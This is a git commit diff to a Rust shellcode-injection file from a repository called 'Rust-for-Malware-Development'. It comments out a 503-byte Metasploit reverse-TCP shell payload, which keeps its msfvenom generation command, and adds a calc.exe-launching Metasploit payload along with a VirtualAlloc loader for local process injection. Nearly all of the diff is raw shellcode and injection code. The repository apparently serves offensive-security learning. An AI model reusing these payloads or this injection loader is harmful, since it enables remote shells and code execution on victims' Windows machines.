INJECT ON LOCALPROCESS

Whitecat18 · web-flow · commit 56b477cef7f7 · 2024-04-28T20:18:20.000+05:30
diff --git a/Process-Injection/inject_on_localprocess.rs b/Process-Injection/inject_on_localprocess.rs
@@ -1,7 +1,7 @@
 /*
-CreateRemoteThread ShellCode Injection : LocalProcess
-For more Codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
-@5mukx
+    CreateRemoteThread ShellCode Injection : LocalProcess
+    For more Codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
+    @5mukx
 */
 
 use std::ptr::null_mut;
@@ -25,56 +25,80 @@ macro_rules! error {
 fn main(){
     // MSFPAYLOAD !
     //msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 -f rust -b \x00\x0a\x0d
-    let buf: [u8; 503] = [0x48,0x31,0xc9,0x48,0x81,0xe9,0xc6,
-    0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,0xff,0xff,0x48,0xbb,
-    0x90,0x2a,0x5b,0x02,0xfe,0x59,0xda,0xcc,0x48,0x31,0x58,0x27,
-    0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0x6c,0x62,0xd8,0xe6,
-    0x0e,0xb1,0x1a,0xcc,0x90,0x2a,0x1a,0x53,0xbf,0x09,0x88,0x9d,
-    0xc6,0x62,0x6a,0xd0,0x9b,0x11,0x51,0x9e,0xf0,0x62,0xd0,0x50,
-    0xe6,0x11,0x51,0x9e,0xb0,0x62,0xd0,0x70,0xae,0x11,0xd5,0x7b,
-    0xda,0x60,0x16,0x33,0x37,0x11,0xeb,0x0c,0x3c,0x16,0x3a,0x7e,
-    0xfc,0x75,0xfa,0x8d,0x51,0xe3,0x56,0x43,0xff,0x98,0x38,0x21,
-    0xc2,0x6b,0x0a,0x4a,0x75,0x0b,0xfa,0x47,0xd2,0x16,0x13,0x03,
-    0x2e,0xd2,0x5a,0x44,0x90,0x2a,0x5b,0x4a,0x7b,0x99,0xae,0xab,
-    0xd8,0x2b,0x8b,0x52,0x75,0x11,0xc2,0x88,0x1b,0x6a,0x7b,0x4b,
-    0xff,0x89,0x39,0x9a,0xd8,0xd5,0x92,0x43,0x75,0x6d,0x52,0x84,
-    0x91,0xfc,0x16,0x33,0x37,0x11,0xeb,0x0c,0x3c,0x6b,0x9a,0xcb,
-    0xf3,0x18,0xdb,0x0d,0xa8,0xca,0x2e,0xf3,0xb2,0x5a,0x96,0xe8,
-    0x98,0x6f,0x62,0xd3,0x8b,0x81,0x82,0x88,0x1b,0x6a,0x7f,0x4b,
-    0xff,0x89,0xbc,0x8d,0x1b,0x26,0x13,0x46,0x75,0x19,0xc6,0x85,
-    0x91,0xfa,0x1a,0x89,0xfa,0xd1,0x92,0xcd,0x40,0x6b,0x03,0x43,
-    0xa6,0x07,0x83,0x96,0xd1,0x72,0x1a,0x5b,0xbf,0x03,0x92,0x4f,
-    0x7c,0x0a,0x1a,0x50,0x01,0xb9,0x82,0x8d,0xc9,0x70,0x13,0x89,
-    0xec,0xb0,0x8d,0x33,0x6f,0xd5,0x06,0x4b,0x40,0x2e,0xa9,0xfe,
-    0xcf,0x19,0x69,0x02,0xfe,0x18,0x8c,0x85,0x19,0xcc,0x13,0x83,
-    0x12,0xf9,0xdb,0xcc,0x90,0x63,0xd2,0xe7,0xb7,0xe5,0xd8,0xcc,
-    0x91,0x91,0x9b,0xaa,0x98,0x43,0x9b,0x98,0xd9,0xa3,0xbf,0x4e,
-    0x77,0xa8,0x9b,0x76,0xdc,0x5d,0x7d,0x05,0x01,0x8c,0x96,0x45,
-    0x7a,0x42,0x5a,0x03,0xfe,0x59,0x83,0x8d,0x2a,0x03,0xdb,0x69,
-    0xfe,0xa6,0x0f,0x9c,0xc0,0x67,0x6a,0xcb,0xb3,0x68,0x1a,0x84,
-    0x6f,0xea,0x13,0x8b,0x3c,0x11,0x25,0x0c,0xd8,0xa3,0x9a,0x43,
-    0x44,0xb3,0xd5,0x13,0x70,0xd5,0x8e,0x4a,0x77,0x9e,0xb0,0xdc,
-    0xd1,0x72,0x17,0x8b,0x1c,0x11,0x53,0x35,0xd1,0x90,0xc2,0xa7,
-    0x8a,0x38,0x25,0x19,0xd8,0xab,0x9f,0x42,0xfc,0x59,0xda,0x85,
-    0x28,0x49,0x36,0x66,0xfe,0x59,0xda,0xcc,0x90,0x6b,0x0b,0x43,
-    0xae,0x11,0x53,0x2e,0xc7,0x7d,0x0c,0x4f,0xcf,0x99,0xb0,0xc1,
-    0xc9,0x6b,0x0b,0xe0,0x02,0x3f,0x1d,0x88,0xb4,0x7e,0x5a,0x03,
-    0xb6,0xd4,0x9e,0xe8,0x88,0xec,0x5b,0x6a,0xb6,0xd0,0x3c,0x9a,
-    0xc0,0x6b,0x0b,0x43,0xae,0x18,0x8a,0x85,0x6f,0xea,0x1a,0x52,
-    0xb7,0xa6,0x12,0x81,0x19,0xeb,0x17,0x8b,0x3f,0x18,0x60,0xb5,
-    0x5c,0x15,0xdd,0xfd,0x2b,0x11,0xeb,0x1e,0xd8,0xd5,0x91,0x89,
-    0xf0,0x18,0x60,0xc4,0x17,0x37,0x3b,0xfd,0x2b,0xe2,0x2a,0x79,
-    0x32,0x7c,0x1a,0xb8,0x58,0xcc,0x67,0x51,0x6f,0xff,0x13,0x81,
-    0x3a,0x71,0xe6,0xca,0xec,0x20,0xdb,0xf9,0x1e,0x2c,0xdf,0x77,
-    0xd7,0x39,0x29,0x6d,0x94,0x59,0x83,0x8d,0x19,0xf0,0xa4,0xd7,
-    0xfe,0x59,0xda,0xcc];
+    // let buf: [u8; 503] = [0x48,0x31,0xc9,0x48,0x81,0xe9,0xc6,
+    // 0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,0xff,0xff,0x48,0xbb,
+    // 0x90,0x2a,0x5b,0x02,0xfe,0x59,0xda,0xcc,0x48,0x31,0x58,0x27,
+    // 0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0x6c,0x62,0xd8,0xe6,
+    // 0x0e,0xb1,0x1a,0xcc,0x90,0x2a,0x1a,0x53,0xbf,0x09,0x88,0x9d,
+    // 0xc6,0x62,0x6a,0xd0,0x9b,0x11,0x51,0x9e,0xf0,0x62,0xd0,0x50,
+    // 0xe6,0x11,0x51,0x9e,0xb0,0x62,0xd0,0x70,0xae,0x11,0xd5,0x7b,
+    // 0xda,0x60,0x16,0x33,0x37,0x11,0xeb,0x0c,0x3c,0x16,0x3a,0x7e,
+    // 0xfc,0x75,0xfa,0x8d,0x51,0xe3,0x56,0x43,0xff,0x98,0x38,0x21,
+    // 0xc2,0x6b,0x0a,0x4a,0x75,0x0b,0xfa,0x47,0xd2,0x16,0x13,0x03,
+    // 0x2e,0xd2,0x5a,0x44,0x90,0x2a,0x5b,0x4a,0x7b,0x99,0xae,0xab,
+    // 0xd8,0x2b,0x8b,0x52,0x75,0x11,0xc2,0x88,0x1b,0x6a,0x7b,0x4b,
+    // 0xff,0x89,0x39,0x9a,0xd8,0xd5,0x92,0x43,0x75,0x6d,0x52,0x84,
+    // 0x91,0xfc,0x16,0x33,0x37,0x11,0xeb,0x0c,0x3c,0x6b,0x9a,0xcb,
+    // 0xf3,0x18,0xdb,0x0d,0xa8,0xca,0x2e,0xf3,0xb2,0x5a,0x96,0xe8,
+    // 0x98,0x6f,0x62,0xd3,0x8b,0x81,0x82,0x88,0x1b,0x6a,0x7f,0x4b,
+    // 0xff,0x89,0xbc,0x8d,0x1b,0x26,0x13,0x46,0x75,0x19,0xc6,0x85,
+    // 0x91,0xfa,0x1a,0x89,0xfa,0xd1,0x92,0xcd,0x40,0x6b,0x03,0x43,
+    // 0xa6,0x07,0x83,0x96,0xd1,0x72,0x1a,0x5b,0xbf,0x03,0x92,0x4f,
+    // 0x7c,0x0a,0x1a,0x50,0x01,0xb9,0x82,0x8d,0xc9,0x70,0x13,0x89,
+    // 0xec,0xb0,0x8d,0x33,0x6f,0xd5,0x06,0x4b,0x40,0x2e,0xa9,0xfe,
+    // 0xcf,0x19,0x69,0x02,0xfe,0x18,0x8c,0x85,0x19,0xcc,0x13,0x83,
+    // 0x12,0xf9,0xdb,0xcc,0x90,0x63,0xd2,0xe7,0xb7,0xe5,0xd8,0xcc,
+    // 0x91,0x91,0x9b,0xaa,0x98,0x43,0x9b,0x98,0xd9,0xa3,0xbf,0x4e,
+    // 0x77,0xa8,0x9b,0x76,0xdc,0x5d,0x7d,0x05,0x01,0x8c,0x96,0x45,
+    // 0x7a,0x42,0x5a,0x03,0xfe,0x59,0x83,0x8d,0x2a,0x03,0xdb,0x69,
+    // 0xfe,0xa6,0x0f,0x9c,0xc0,0x67,0x6a,0xcb,0xb3,0x68,0x1a,0x84,
+    // 0x6f,0xea,0x13,0x8b,0x3c,0x11,0x25,0x0c,0xd8,0xa3,0x9a,0x43,
+    // 0x44,0xb3,0xd5,0x13,0x70,0xd5,0x8e,0x4a,0x77,0x9e,0xb0,0xdc,
+    // 0xd1,0x72,0x17,0x8b,0x1c,0x11,0x53,0x35,0xd1,0x90,0xc2,0xa7,
+    // 0x8a,0x38,0x25,0x19,0xd8,0xab,0x9f,0x42,0xfc,0x59,0xda,0x85,
+    // 0x28,0x49,0x36,0x66,0xfe,0x59,0xda,0xcc,0x90,0x6b,0x0b,0x43,
+    // 0xae,0x11,0x53,0x2e,0xc7,0x7d,0x0c,0x4f,0xcf,0x99,0xb0,0xc1,
+    // 0xc9,0x6b,0x0b,0xe0,0x02,0x3f,0x1d,0x88,0xb4,0x7e,0x5a,0x03,
+    // 0xb6,0xd4,0x9e,0xe8,0x88,0xec,0x5b,0x6a,0xb6,0xd0,0x3c,0x9a,
+    // 0xc0,0x6b,0x0b,0x43,0xae,0x18,0x8a,0x85,0x6f,0xea,0x1a,0x52,
+    // 0xb7,0xa6,0x12,0x81,0x19,0xeb,0x17,0x8b,0x3f,0x18,0x60,0xb5,
+    // 0x5c,0x15,0xdd,0xfd,0x2b,0x11,0xeb,0x1e,0xd8,0xd5,0x91,0x89,
+    // 0xf0,0x18,0x60,0xc4,0x17,0x37,0x3b,0xfd,0x2b,0xe2,0x2a,0x79,
+    // 0x32,0x7c,0x1a,0xb8,0x58,0xcc,0x67,0x51,0x6f,0xff,0x13,0x81,
+    // 0x3a,0x71,0xe6,0xca,0xec,0x20,0xdb,0xf9,0x1e,0x2c,0xdf,0x77,
+    // 0xd7,0x39,0x29,0x6d,0x94,0x59,0x83,0x8d,0x19,0xf0,0xa4,0xd7,
+    // 0xfe,0x59,0xda,0xcc];
+
+    // Testing msf calc payload !
+        let buf: [u8; 276] = [
+            0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
+            0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
+            0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
+            0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
+            0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
+            0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
+            0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48,
+            0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
+            0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c,
+            0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
+            0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04,
+            0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
+            0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48,
+            0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
+            0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f,
+            0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
+            0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
+            0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
+            0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
+        ];
+
 
     unsafe{
         let exec = VirtualAlloc(
             null_mut(),
             buf.len(),
             0x1000,
-            0x40,
+            0x04, 
         );
 
         if exec.is_null(){
